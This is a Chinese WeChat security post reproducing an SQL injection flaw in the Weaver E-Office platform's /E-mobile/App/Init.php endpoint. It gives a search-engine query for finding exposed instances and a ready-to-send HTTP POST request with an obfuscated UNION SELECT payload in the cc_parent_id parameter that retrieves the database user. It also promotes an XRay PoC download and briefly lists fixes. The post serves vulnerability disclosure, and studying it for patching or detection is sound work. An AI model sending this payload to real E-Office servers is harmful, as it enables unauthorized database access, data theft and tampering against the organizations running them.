免责申明:本公众号的文章及工具仅用作学习交流,切勿用于其它用途。由于传播、利用此文所提供的信息而造成的任何直接或间接后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。如有侵权请告知,谢谢!
0x01、漏洞描述
泛微 E-Office 协同办公平台/E-mobile/App/Init.php接口存在SQL注入漏洞,攻击者可利用该漏洞执行任意SQL语句,进行增、删、改、查等数据库操作,造成数据库敏感数据信息泄露或被篡改;
漏洞影响
泛微 E-Office网络测绘
app="泛微-EOffice"0x02、漏洞复现
发送如下数据包,即可获取数据库用户名;
POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 60Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: closecc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()
0x03、POC
使用XRay POC进行漏洞验证;
0x04、修复建议
升级至最新安全版本;
对用户的输入进行过滤;
对查询参数进行预编译;
下载地址
点击下方名片进入公众号
回复关键字【20231018】获取XRay POC下载链接
原文始发于微信公众号(菜鸟学网安):漏洞复现 | 泛微 E-Office 协同办公平台 Init.php SQL注入漏洞 附POC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论